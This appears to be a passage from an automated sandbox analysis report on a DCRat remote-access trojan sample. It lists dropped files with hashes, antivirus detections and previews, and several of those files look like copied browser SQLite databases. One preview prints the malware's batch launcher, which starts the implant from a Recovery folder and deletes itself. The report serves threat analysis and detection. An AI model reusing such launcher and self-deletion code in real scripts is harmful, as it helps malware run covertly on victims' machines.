                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43ln5s5n.asi.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4grtcvlm.m2y.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3wj0dml.gb1.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbkn1ahn.kwx.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5weyhhr.yo0.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_giuyvma5.xg2.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igp2m0rp.xue.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jjp3owve.psq.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lspa0qxj.bau.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nswsmeko.xsm.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntzmphl2.v4p.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teuw12na.vmq.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vo20fcbb.301.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wf3yjww1.b3t.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x02ph1ih.aiw.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnsjzw5c.h3e.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\aLTYvtmwcm

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ba5USEfrK0

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@......@.....@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......P...0...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Users\user\AppData\Local\Temp\dD82yUOZl5

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.1209886597424439
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):174
                                                                                          Entropy (8bit):5.393979681157607
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7cfS33H6wP0dLvBktKcKZG1CHyg4E2J5xAIVNf:hCRLuVFOOr+DE7cqa0kLvKOZG1CHhJ2f
                                                                                          MD5:4EA08A80E9BA484177F5D93C84E3D8B5
                                                                                          SHA1:6CEE0D675FC1CCAEBC0368551B64BCAE87A0BBBA
                                                                                          SHA-256:FE3865FCE70CB26C35934D79C9EBCD6FD964823D639A9272D2AD745FA6F48714
                                                                                          SHA-512:76D24880CD74CB761F72C79FEE4F05187CD1E8F32C3AA14004F8577F2D0E8147D63359D63673FC1362088F36669CA578A838A6312F7A829748683D93F4C21AEC
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dmMZ8RlPbE.bat"

                                                                                          C:\Users\user\AppData\Local\Temp\e0qXh1dJY7

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\fJ19GnWkV7

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\ie7fmZcx3a

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.5638561897747225
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:btupwIo:Jups
                                                                                          MD5:E31C4F4D2448441FDE1405B7D6C32BDF
                                                                                          SHA1:6C057457FC417313BF848E4D3A80E3D98FCE9F41
                                                                                          SHA-256:F8E709C30F4A58E4735547F91F2068AFA71C35C846FC44BF403061AD86DDA4A8
                                                                                          SHA-512:C5FDB2262178BC45DCAAD5AE7BC0CCF30B4765B082DDFAAB287FD8A6A50180958F5AEEA36B106742C28032011D0B2FA1D222E6F6838A92B20220677FB2D84C5A
                                                                                          Malicious:false
                                                                                          Preview:ukHS4l6021BwYpLIkUcft8GNM

                                                                                          C:\Users\user\AppData\Local\Temp\jp90fc7Pje

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):1.3909341910495931
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                                          MD5:1EB30D95ED94CA01369986C3811A0591
                                                                                          SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                                          SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                                          SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\kjCBTk0eEP

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):98304
                                                                                          Entropy (8bit):0.08235737944063153
                                                                                          Encrypted:false
